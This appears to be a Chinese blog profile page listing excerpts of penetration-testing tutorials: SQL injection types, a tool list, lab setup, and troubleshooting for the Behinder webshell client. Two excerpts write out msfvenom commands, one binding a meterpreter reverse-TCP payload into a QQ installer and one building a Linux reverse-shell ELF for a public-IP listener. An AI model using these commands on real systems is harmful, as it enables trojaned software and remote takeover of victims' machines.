自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(9)
  • 收藏
  • 关注

原创 sql注入类型

1. 什么是sql注入通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。2. sql注入类型按照注入点类型来分类(1)数字型注入点许多网页链接有类似的结构http://xxx.com/users.php?id=1基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数的网页中,诸如 查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,查询出数据库中对应的信息,返回..

2022-04-30 18:34:40 4477

原创 网络安全工具列表

网络安全工具列表Sec-Tools-List主要总结渗透中利用到的一些工具,按照ATT&CK矩阵的流程进行分类,在此基础上进行了更细致的划分。一些常用的工具(Nmap、MSF、Minikatz不在记录)Initial_Access1. 信息搜集1.1 人员泄露信息(浏览器、泄露数据库)datasploittheHarvesterspiderfoot社交信息ScrapedIn:搜索 Linkedin 信息ThreatIngestor:Twitter、RSS等文件元数据

2022-04-20 17:13:05 8962

原创 从0到1:CTFer成长之路docker环境搭建

1. 安装 docker使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使用国内 daocloud 一键安装命令: sudo curl -sSL https://get.daocloud.io/docker | sh 由于之前使用了 snap 安装过 docker,运行 docker 命令出现: bash:/snap/bin/do...

2022-04-17 20:21:03 1549

原创 msfconsole捆绑木马

捆绑木马这里使用的是Kalilinux虚拟机攻击机ip是192.168.0.108靶机ip是192.168.177.134生成木马文件首先上传一个正常的安装包到kali里面我这里下了一个QQ把它上传到了root路径下然后开始捆绑msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe-p:指定后面.

2022-04-15 19:50:19 6556 7

原创 Ubuntu 系统下安装Discuz出现“HTTP ERROR 500”目前无法处理此请求

问题:当我们在Ubuntu 16.04系统下安装Disucz X3时,修改好文件的权限,浏览器输入地址安装时出现如下图所示问题:问题查询:在终端输入:tail -f /var/log/apache2/error.log查看错误日志,可以看到如下错误日志:日志显示在目录/discuz/install/index.php第12行出现“Call to undefined function set_magic_quotes_runtime()”,这是因为我按安装的是php7.0,而这个函数“s

2022-03-31 22:21:15 619

原创 云服务器msf跨域反弹shell

环境部署服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。生成木马msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马利用msf攻击使用xftp将生成的木马上传进被攻击机内,这里放

2022-03-29 20:37:15 6034

原创 冰蝎(Behinder)双击无法打开

本机安装java环境版本:java 17.0.2 2022-01-18 LTSJava(TM) SE Runtime Environment (build 17.0.2+8-LTS-86)Java HotSpot(TM) 64-Bit Server VM (build 17.0.2+8-LTS-86, mixed mode, sharing)放一下冰蝎链接:​​​​​​Releases · rebeyond/Behinder · GitHub打不开的原因:冰蝎beta7版本客户端不再内置

2022-03-27 19:18:29 11255

原创 ubuntu下搭建不同端口网站

第一次用ubuntu手动搭建wordpress,discuz走了很多弯路,由于不熟练导致有些地方总是出错不能够正常执行,总结了一下方便以后查看。安装 Apache:sudo apt updatesudo apt install apache2安装 php:sudo apt updatesudo apt install php libapache2-mod-php安装php-mysql插件:apt install -y php-mysql安装 MySQL 5.7:sud

2022-03-12 10:38:23 1529 1

原创 关于upload-labs靶场的安装问题

从github下载的源码解压到网站路径之后打开会出现打开config.php查看代码发现<?phpheader("Content-type: text/html;charset=utf-8");//error_reporting(0);//设置靶机所在路径$site_root = "/upload-labs";//设置上传目录$UPLOAD_ADDR = "../upload/";?>运行此脚本后会出现Notice: Undefined index: userna

2022-02-16 23:38:59 491

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除